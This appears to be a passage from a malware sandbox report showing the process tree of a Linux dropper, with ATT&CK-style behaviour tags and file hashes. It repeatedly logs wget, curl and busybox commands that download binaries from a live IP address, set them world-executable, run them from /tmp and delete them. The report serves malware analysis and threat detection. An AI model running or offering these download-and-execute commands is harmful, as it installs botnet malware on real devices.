/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵PID:940
-
-
/bin/chmodchmod 777 rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR./rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵PID:943
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:944
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:946
-
-
/bin/chmodchmod 777 P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88./P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:948
-
-
/bin/rmrm P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:949
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵PID:950
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵PID:952
-
-
/bin/chmodchmod 777 wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi./wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵PID:955
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵PID:956
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵PID:958
-
-
/bin/chmodchmod 777 ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY./ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵PID:961
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:962
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:964
-
-
/bin/chmodchmod 777 Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90./Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:967
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵PID:968
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵PID:970
-
-
/bin/chmodchmod 777 Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8./Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵PID:973
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵PID:974
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵PID:976
-
-
/bin/chmodchmod 777 lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- File and Directory Permissions Modification
PID:977
-
-
/tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu./lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- Executes dropped EXE
PID:978
-
-
/bin/rmrm lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵PID:979
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵PID:980
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:981
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵PID:982
-
-
/bin/chmodchmod 777 sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6./sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵PID:985
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97